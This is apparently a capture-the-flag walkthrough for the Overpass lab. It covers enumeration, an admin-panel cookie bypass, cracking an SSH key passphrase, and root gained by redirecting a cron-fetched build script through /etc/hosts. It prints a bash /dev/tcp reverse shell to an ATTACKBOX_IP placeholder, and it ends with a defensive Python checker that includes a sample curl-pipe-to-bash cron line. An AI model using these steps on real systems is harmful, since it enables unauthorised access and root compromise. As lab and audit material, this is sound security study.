Prerequisites for this machine:
- Familiarity with enumeration with Nmap and ffuf or gobuster
- Basic understanding of web applications and JavaScript
- Understanding of ssh
- Basic networking knowledge
Enumeration
To start off, we run an Nmap scan on the machine.
From the scan, we can see that two ports are open: 22 (ssh) and 80 (http).
Enumerating the site with ffuf gives us a list of directories.
Getting the first flag
“/admin” looks interesting; checking the page’s source code leads us to a file, “login.js”.
Looking at the “login()” function, we can see that if we have a “SessionToken” cookie, we’ll be able to access the admin panel.
Set the “SessionToken” cookie, change its path to “/”, and refresh the page.
And we have access to the admin panel, which gives us an RSA private key.
We copy this key into a file named “id_rsa” and use ssh2john.py to convert it into a hash format that John The Ripper can work with.
After running John The Ripper on “id_rsa.hash”, we get the passphrase “james13” for the key, which belongs to the user “james” (the username is shown on the admin panel).
Now we can ssh into the machine as james and read the first flag from “user.txt”.
Getting the second flag
Taking a look at “todo.txt” hints at a cron job running on the machine; we can find out what it executes by listing “/etc/crontab”.
The cron job fetches “buildscript.sh” from “overpass.thm”; we can exploit this by editing the “/etc/hosts” file so that this hostname points to our attackbox.
Back on the attackbox, create the directory “/downloads/src” and, inside it, the script “buildscript.sh”.
To exploit the machine, we need to put a reverse shell into buildscript.sh; you can find some examples here.
We can use this simple reverse shell and add it to our script.
bash -i >& /dev/tcp/ATTACKBOX_IP/8080 0>&1
Next, make sure buildscript.sh is executable:
chmod +x buildscript.sh
Once that is done, start a Netcat listener on the attackbox, making sure it listens on the same port used in the reverse shell, in this case 8080.
To make the script reachable from the machine, we can serve it with a simple HTTP server using Python.
After the cron job executes, we can see the machine requesting the file from the attackbox.
Back to the Netcat listener, we have a shell!
The final flag is in root.txt.
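The privilege escalation above depends on two things a defender can audit on a host: a root cron job that fetches a script by hostname and pipes it into a shell, and an /etc/hosts entry that decides where that hostname resolves. The Python below is an added example, not part of the original walkthrough; it parses constructed sample copies of /etc/crontab and /etc/hosts (the cron line, hostnames and the address are made up for the sample) and flags such jobs together with where the hosts file currently sends the name.

```python
import re

# Constructed sample inputs (not captured from the machine), modelled on the pattern this
# walkthrough describes: a root cron job fetching a build script by hostname, plus /etc/hosts.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * *  root  curl overpass.thm/downloads/src/buildscript.sh | bash
0 3 * * *  backup  /usr/local/bin/backup.sh
"""
SAMPLE_HOSTS = "127.0.0.1 localhost\n10.10.14.7 overpass.thm\n"

FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
# First dotted hostname after the fetch tool; either prefixed by http(s):// or standing alone
# (not part of a flag like -O or a path like /tmp/b.sh). Heuristic, not a full URL parser.
HOST_RE = re.compile(r"(?:https?://|(?<![\w./-]))([a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9-]+)+)(?=[/:\s]|$)", re.I)
# "| bash" / "| sh" in the same command, or "bash <file>.sh" after a download.
EXEC_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba)?sh\b|\b(?:ba)?sh\s+\S+\.sh\b")

def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-format text: 5 time fields, user, command."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs

def parse_hosts(text):
    """Map every hostname in /etc/hosts-format text to the address on its line."""
    mapping = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        for name in fields[1:]:
            mapping[name] = fields[0]
    return mapping

def find_remote_exec_jobs(crontab_text, hosts_text):
    """Flag cron jobs that download a script by hostname and execute it, and report where
    /etc/hosts currently sends that name (a writable entry there redirects the job)."""
    hosts = parse_hosts(hosts_text)
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        fetch = FETCH_RE.search(cmd)
        if not fetch or not EXEC_RE.search(cmd):
            continue
        host = HOST_RE.search(cmd, fetch.end())
        name = host.group(1) if host else None
        findings.append({"user": user, "host": name, "resolves_to": hosts.get(name), "command": cmd})
    return findings
```

Run it against the real files with `open("/etc/crontab").read()` and `open("/etc/hosts").read()`; any finding whose user is root and whose hostname is resolved by a world-writable hosts file is the exact weakness this room exploits.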